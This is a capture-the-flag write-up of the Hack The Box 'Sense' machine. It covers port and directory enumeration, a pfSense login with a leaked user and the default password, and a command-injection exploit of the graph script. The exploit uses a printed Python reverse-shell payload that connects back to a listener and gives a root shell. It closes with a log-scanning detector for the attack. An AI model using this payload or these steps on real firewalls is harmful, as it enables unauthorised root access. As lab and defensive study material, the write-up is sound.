Sense

tags: HTB Easy FreeBSD OSCP
Platform: Hackthebox
Difficulty: Easy
OS: FreeBSD

Enumeration

Nmap

To get started, we run a quick scan of all TCP ports to see which are open.

# nmap -p- -T4 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:17 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.094s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 91.70 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 80,443 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:19 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.093s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/http lighttpd 1.4.35
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: lighttpd/1.4.35
|_http-title: 501
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): Comau embedded (92%)
Aggressive OS guesses: Comau C4G robot control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   93.34 ms 10.10.14.1
2   93.34 ms sense.htb (10.10.10.60)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.55 seconds

Browsing to the web server, we find a pfSense installation.

Gobuster

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60/ -x php,txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2021/03/21 21:04:18 Starting gobuster
===============================================================
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)
===============================================================
2021/03/21 22:50:55 Finished
===============================================================

Inside system-users.txt we find a username and a hint about the password.

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

Trying the user rohit with the pfSense default password, pfsense, we get into the panel.

Exploitation

A bit of searching shows that the graph module has a vulnerability that allows command injection. I also found this page, where a Python exploit is available.

In the exploit, you originally only have to modify lines 27 to 31:

username =      "admin"
password =      "pfsense"
listener_ip =   "10.0.0.1"
listener_port = "4444"
target_ip = "10.0.0.2"

In my case the nc payload did not work, and with msf a connection was established but dropped instantly, so I modified the nc payload to execute a Python reverse shell instead, escaping the quotes properly.

# php/reverse_php
php_reverse_shell = """
exec('python -c \\\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",8787));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\\\'');
"""

Now we only have to start a listener in another terminal and run the exploit.

# python3 pfSenseRCI.py nc
[*] setting payload to nc reverse shell (catch with 'nc -lvp PORT')
[*] exploiting pfsense_graph_injection_exec
[*] generating obfuscated/encoded reverse shell payload for 10.10.14.5:8787
    [+] generated obfuscated/encoded payload
[+] authenticating to firewall with (rohit:pfsense)
    [+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
    [+] authentication successful!
    [+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
[*] octal encoding payload
    [+] encoding complete

[*] injecting into https://10.10.10.60/status_rrd_graph_img.php
    [+] exploit code injected successfully
[*] triggering the exploit (make sure to catch on 10.10.14.5:8787)

And enjoy being root!!

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 23408
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /home/rohit/user.txt
CENSORED_FLAG 
# cat /root/root.txt
CENSORED_FLAG
#
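From the defender's side, two things gave this box away: a stray system-users.txt served from the pfSense web root, and an octal-encoded query to status_rrd_graph_img.php, which is exactly what the exploit output above reports. The following detection is an added example (not part of the original writeup or of the exploit) that scans lighttpd access-log lines for both; it assumes lighttpd's default accesslog format, and the log lines and the "q" parameter are constructed.

```python
import re
from urllib.parse import unquote

# Constructed lighttpd access-log lines (not from the original box); line 3
# carries placeholder octal escapes in a made-up "q" parameter, not a payload.
SAMPLE_LOG = """\
10.10.14.5 sense.htb - [21/Mar/2021:19:20:01 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 sense.htb - [21/Mar/2021:21:04:40 +0100] "GET /system-users.txt HTTP/1.1" 200 97 "-" "gobuster/3.0.1"
10.10.14.5 sense.htb - [21/Mar/2021:21:52:11 +0100] "GET /status_rrd_graph_img.php?q=\\164\\145\\163\\164\\061 HTTP/1.1" 200 1234 "-" "python-requests/2.25.1"
10.10.14.5 sense.htb - [21/Mar/2021:21:52:12 +0100] "GET /status_rrd_graph_img.php?q=wan HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# lighttpd default accesslog.format: host vhost user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Files a pfSense web root should never serve; the ticket file found on this
# box is the seed, extend the set with your own leftover-file names.
SENSITIVE_FILES = {"/system-users.txt"}
GRAPH_SCRIPT = "/status_rrd_graph_img.php"
OCTAL_RE = re.compile(r"\\[0-7]{3}")   # \NNN escapes, as the exploit output reports
SHELL_META = ";|&`$"                   # characters a graph name never needs


def analyze_line(line: str) -> list:
    """Return a list of alert strings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable log line"]
    path, _, query = m.group("target").partition("?")
    query = unquote(query)             # decode %XX before inspecting
    alerts = []
    if path in SENSITIVE_FILES and m.group("status") == "200":
        alerts.append(f"sensitive file served: {path}")
    if path == GRAPH_SCRIPT:
        octal = len(OCTAL_RE.findall(query))
        meta = sorted(c for c in SHELL_META if c in query)
        if octal >= 3 or meta:
            alerts.append(
                f"suspicious query to {path} from {m.group('src')}: "
                f"{octal} octal escapes, metachars={meta}"
            )
    return alerts


def scan_log(text: str) -> list:
    """Scan a whole log; returns (line number, alert) pairs."""
    return [(n, a) for n, line in enumerate(text.splitlines(), 1)
            for a in analyze_line(line)]
```

Run scan_log over the real access log (or feed it line by line from a log shipper); a 200 for the ticket file or an octal-heavy query to the graph script should each page someone.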